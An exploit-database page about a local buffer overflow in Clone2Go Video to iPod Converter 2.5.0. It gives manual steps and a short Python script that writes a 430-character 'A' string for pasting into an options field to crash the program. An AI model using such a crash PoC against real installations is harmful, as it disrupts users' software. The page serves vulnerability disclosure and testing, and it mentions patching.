header-logo
Suggest Exploit
vendor:
Video to iPod Converter
by:
ZwX
7.5
CVSS
HIGH
Denial of Service
119
CWE
Product Name: Video to iPod Converter
Affected Version From: 2.5.0
Affected Version To: 2.5.0
Patch Exists: YES
Related CWE: N/A
CPE: a:clone2go:video_to_ipod_converter
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 7
2018

Clone2Go Video to iPod Converter 2.5.0 – Denial of Service (PoC)

The local buffer overflow vulnerability can be exploited by local attackers with restricted system user account without user interaction. For security demonstration or to reproduce follow the provided information and steps below to continue. Manual steps to reproduce the vulnerability include installing the software, copying a string from bof.txt to clipboard, running VideoConverter.exex, going to Menu > Edit > Options > Set Output folder (Input), pasting the input string and clicking Open, a messagebox opens, clicking ok, and the software will stable crash or shut down.

Mitigation:

Ensure that the software is up to date and all security patches are applied.
Source

Exploit-DB raw data:

# Exploit Title: Clone2Go Video to iPod Converter 2.5.0 - Denial of Service (PoC)
# Exploit Author: ZwX
# Exploit Date: 2018-09-11
# Vendor Homepage : http://www.clone2go.com/
# Software Link: http://www.clone2go.com/down/video-to-ipod-setup.exe
# Tested on OS: Windows 7 

# Proof of Concept (PoC):
# The local buffer overflow vulnerability can be exploited by local attackers with 
# restricted system user account without user interaction. For security demonstration 
# or to reproduce follow the provided information and steps below to continue.

# Manual steps to reproduce the vulnerability ...
# 1 Install the software and start the client
# 2 Copy  the AAAA...string from bof.txt to clipboard
# 3 Run VideoConverter.exex
# 4 Go Menu Menu > Edit > Options > Set Output folder (Input)
# 5 Paste it the input AAAA....string and click Open
# 6 A messagebox opens click ok
# 7 Software will stable crash or shut down
# 8 Successful reproduce of the Denial of Service

#!/usr/bin/python

buffer = "\x41" * 430

poc = buffer
file = open("poc.txt","w")
file.write(poc)
file.close()
 
print "POC Created by ZwX"